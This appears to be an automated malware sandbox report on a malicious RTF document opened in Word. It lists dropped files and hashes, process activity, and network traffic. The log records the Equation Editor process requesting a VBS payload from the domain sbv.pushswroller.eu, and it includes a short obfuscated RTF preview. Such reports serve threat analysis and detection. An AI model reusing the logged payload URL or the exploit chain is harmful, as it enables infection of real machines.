    Preview:9.6.0.5.7.4.4.5.<.?...2.^.|.(.@.5.].#.<.@.>.1.9.?.?.2...4.:.#.(...9.~.3.1.].?.+./.1.?.+.>.].+...[...,.~.;.,.?.?.|.5.%.<.0.9.5.%.^.?./.?.,.?./.|.9.?.|.?.=.<.-.;.(./.'./.^.-.^.].~.6.3.[.,.$.@.?.?.:.?.4.5.3.?.).&.|.7.`.^.?.2.?.9.?.;.6._.5...+.|.;.8.6.).?.7.8.|.]...`.!.+.;.<.].7.#.`.`.7.#...`.`./.*.9...%./.+...0...!...%.`.~.#.1...)...~.?.].[.#.?.&.$.*.(.:.$.4.8.]...?.:.].%.].4.!.>.#.:.$...|.1.-.[.4.?.8.&.[.'.6.]...(.8.$.6.].+.'.%.7...%./.$.?.4.4...&.5.1...>._.[._.%.&.?.'.).'.?.-.1.,._.).).6.*.%.$.)._.3.|._.3._.?.]./.<...%.%.-.-.*.?.*.+.@.5.@.:.:.<.(.(.].0.@.5.+.....^.?.;.(.[.!.%.9.%.?.3._.7.3.9./.2.?.-.<.|./.3.<.?.|.(...6.2...@.@.:.,.../.|.].)./...[.-.]...].<.*./.+...^.^.:...,...@.;.?._.!.~.2.*.7.9.&.|.'...(.?.?.*.!.<.%.~.>.2.6.'.=.!.^.9.|.&.5.`.3.'.].3.2.8.&._.~.?.?.;.3.<.;.?.).>.<.!.4.....`.=.#.1.?...^.@.!.%.|.|.;.0.,...^...=.`.].=.|.=.1.`.(.).`.[.9./.'.?.0.#.=.<.).1.%...?.|.*.;.&...|.(.^.@.?.,.&.|...9.|.5.=.4.*.....|.5./.;.8...,.[.(.|.:.;.(.+._.0.~.9.?.=.?._.'.>./.'.].^.%.<.;.8.7.!.).`.
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):1024
    Entropy (8bit):0.05390218305374581
    Encrypted:false
    SSDEEP:3:ol3lYdn:4Wn
    MD5:5D4D94EE7E06BBB0AF9584119797B23A
    SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
    SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
    SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
    Malicious:false
    Reputation:high, very likely benign file
    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Aug 11 15:42:05 2023, mtime=Fri Aug 11 15:42:05 2023, atime=Wed Dec 4 10:16:53 2024, length=56125, window=hide
    Category:dropped
    Size (bytes):1014
    Entropy (8bit):4.544114270739737
    Encrypted:false
    SSDEEP:12:8b16FgXg/XAlCPCHaXfyBHNB/Dr8xX+WhofsONMicvbPK4J4DtZ3YilMMEpxRljX:8bw/XT6dNxOT9UHez4Dv3qs57u
    MD5:7415FA967D16EC53E6E0C1CB1EF33B64
    SHA1:FECD2E1332E69B95127774861DB399B9F01B5102
    SHA-256:FF3C7858C20E6E4D42C966BE78B64EEC6D9FFAE99E6A1DBD8646EDA0F8161B04
    SHA-512:7683661AC3CA018D426D74E93C03EF8A7AF6570BF8AC47D1EE207E898BF674A306C6270177AAD38567C6A772229CE09F0505D1F764AEBD060C4F743BE1928899
    Malicious:false
    Reputation:low
    Preview:L..................F.... ....&(.r....&(.r...6E..>F..=............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Y.Z..user.8......QK.X.Y.Z*...&=....U...............A.l.b.u.s.....z.1......WD...Desktop.d......QK.X.WD.*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....f.2.=....Y.Z .DWOCLR~1.RTF..J.......WC..WC.*.........................D.w.o.c.L.r.f.8.i.K...r.t.f.......x...............-...8...[............?J......C:\Users\..#...................\\284992\Users.user\Desktop\DwocLrf8iK.rtf.%.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.w.o.c.L.r.f.8.i.K...r.t.f.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......284992..........D_....3N...W...9..W.e8...8.....[D_....3N...W...9..W.e8
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:Generic INItialization configuration [folders]
    Category:dropped
    Size (bytes):55
    Entropy (8bit):4.403642667873435
    Encrypted:false
    SSDEEP:3:Hq5GdBpSm4MddBpSv:HkGppdpc
    MD5:29F205A681AF401D383C9B8838A98010
    SHA1:D48F1B35B8FC700C1E13D898FECA59027B47B792
    SHA-256:26F094A3C21C05D4C5DA1F1D90368DED4CFF8DB55EEE4B0430849349EE0C5663
    SHA-512:84B9F87219756F175CEEAE4F05E4C0FF193C0B9315A81725C39CD5E85E9FF09B722CB244F3317247F778162131904F100E38C3AA443BA2C11306A03E9DBCE36B
    Malicious:false
    Preview:[misc]..DwocLrf8iK.LNK=0..[folders]..DwocLrf8iK.LNK=0..
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.4797606462020307
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
    Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    File Type:data
    Category:dropped
    Size (bytes):162
    Entropy (8bit):2.4797606462020307
    Encrypted:false
    SSDEEP:3:vrJlaCkWtVyHlqlzl0pbklMWjV4lc+/dllln:vdsCkWtWYlz21kF2JV/l
    MD5:2CF7D3B8DED3F1D5CE1AC92F3E51D4ED
    SHA1:95E13378EA9CACA068B2687F01E9EF13F56627C2
    SHA-256:60DF94CDE4FD9B4A73BB13775079D75CE954B75DED5A2878277FA64AD767CAB1
    SHA-512:2D5797FBBE44766D93A5DE3D92911358C70D8BE60D5DF542ECEDB77D1195DC1EEF85E4CA1445595BE81550335A20AB3F11B512385FE20F75B1E269D6AB048E0A
    Malicious:false
    Preview:.user..................................................A.l.b.u.s.............p........1...............2..............@3...............3......z.......p4......x...
    File type:Rich Text Format data, version 1
    Entropy (8bit):3.579103922973875
    TrID:
    • Rich Text Format (5005/1) 55.56%
    • Rich Text Format (4004/1) 44.44%
    File name:DwocLrf8iK.rtf
    File size:56'125 bytes
    MD5:f11a6a0e8ae4ccc1c4a311e48b8f464e
    SHA1:6bcd811bf12fa142a18f9710a7b24334530c0807
    SHA256:a02d2abb1a7da0921aa1fa2d4ae713062b16cda330e9755556c2950f7e413398
    SHA512:e7bab4564de6d253a1f5ad0063e973b2567f37c03e71b98ac7b3cb1adfd40b7981d9949e70c53c1bc1b05372366cb189bd9eb03d57ce33ea8b3a6b9ff45e764e
    SSDEEP:384:NThKJjZp8eFxToMioV9TNlrU3+4Y6NlGIIqtPu4Qf+f/3MwVmEpGqt2XPQPb:FIJjzP0sVRt6NlGIIqtuBfMFvG9XPQT
    TLSH:C4438B8AC74E85A5CF456373122B8A4805F8B33EF75691B5B46C93703BECD3E05A94B8
    File Content Preview:{\rtf1..{\*\A1DHGDLzAkKdjqx9DTycS1mB6KMAEzWT9qJGXjllhXoUAQVbYNTVdwbqdG3XmMLDGZwsARrksdgRcDiJLCSAkKK5d0acRgX79F1PIs3iM2rjFiz5EyqsxgLilashLVVwSsR86ZkRonEgDTkgsjYwOZ3Uh1o4eLeVqV8Kj1LhtvjXf2NtwUSbFVsC5MKzWkMZyAzHKoFIFTEbkuIU3ITAd0DcadIl7E5uVtuH4QrzXSe9detHuBW
    Icon Hash:2764a3aaaeb7bdbf
    IdStartFormat IDFormatClassnameDatasizeFilenameSourcepathTemppathExploit
    00000210Ehno
    TimestampSource PortDest PortSource IPDest IP
    Dec 4, 2024 12:16:57.399216890 CET4916180192.168.2.225.182.211.149
    Dec 4, 2024 12:16:57.519140005 CET80491615.182.211.149192.168.2.22
    Dec 4, 2024 12:16:57.519233942 CET4916180192.168.2.225.182.211.149
    Dec 4, 2024 12:16:57.519524097 CET4916180192.168.2.225.182.211.149
    Dec 4, 2024 12:16:57.639267921 CET80491615.182.211.149192.168.2.22
    Dec 4, 2024 12:16:58.757554054 CET80491615.182.211.149192.168.2.22
    Dec 4, 2024 12:16:58.757622957 CET4916180192.168.2.225.182.211.149
    Dec 4, 2024 12:16:58.758343935 CET4916180192.168.2.225.182.211.149
    Dec 4, 2024 12:16:58.879421949 CET80491615.182.211.149192.168.2.22
    Dec 4, 2024 12:16:58.879513979 CET4916180192.168.2.225.182.211.149
    TimestampSource PortDest PortSource IPDest IP
    Dec 4, 2024 12:16:57.104098082 CET5456253192.168.2.228.8.8.8
    Dec 4, 2024 12:16:57.361332893 CET53545628.8.8.8192.168.2.22
    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
    Dec 4, 2024 12:16:57.104098082 CET192.168.2.228.8.8.80xcfc0Standard query (0)sbv.pushswroller.euA (IP address)IN (0x0001)false
    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
    Dec 4, 2024 12:16:57.361332893 CET8.8.8.8192.168.2.220xcfc0No error (0)sbv.pushswroller.eu5.182.211.149A (IP address)IN (0x0001)false
    • sbv.pushswroller.eu
    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
    0192.168.2.22491615.182.211.149803716C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    TimestampBytes transferredDirectionData
    Dec 4, 2024 12:16:57.519524097 CET322OUTGET /tes/jukhccby.vbs HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
    Host: sbv.pushswroller.eu
    Connection: Keep-Alive
    Dec 4, 2024 12:16:58.757554054 CET284INHTTP/1.1 404 Not Found
    content-type: text/html
    cache-control: private, no-cache, max-age=0
    pragma: no-cache
    date: Wed, 04 Dec 2024 11:16:58 GMT
    server: LiteSpeed
    content-encoding: gzip
    vary: Accept-Encoding
    transfer-encoding: chunked
    connection: Keep-Alive
    Data Raw: 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 0d 0a
    Data Ascii: a


    Click to jump to process

    Click to jump to process

    Click to dive into process behavior distribution

    Click to jump to process

    Target ID:0
    Start time:06:16:53
    Start date:04/12/2024
    Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Wow64 process (32bit):false
    Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
    Imagebase:0x13fba0000
    File size:1'423'704 bytes
    MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    Target ID:2
    Start time:06:16:54
    Start date:04/12/2024
    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Imagebase:0x400000
    File size:543'304 bytes
    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:true

    Target ID:5
    Start time:06:17:18
    Start date:04/12/2024
    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
    Wow64 process (32bit):true
    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
    Imagebase:0x400000
    File size:543'304 bytes
    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
    Has elevated privileges:true
    Has administrator privileges:true
    Programmed in:C, C++ or other language
    Reputation:high
    Has exited:false

    No disassembly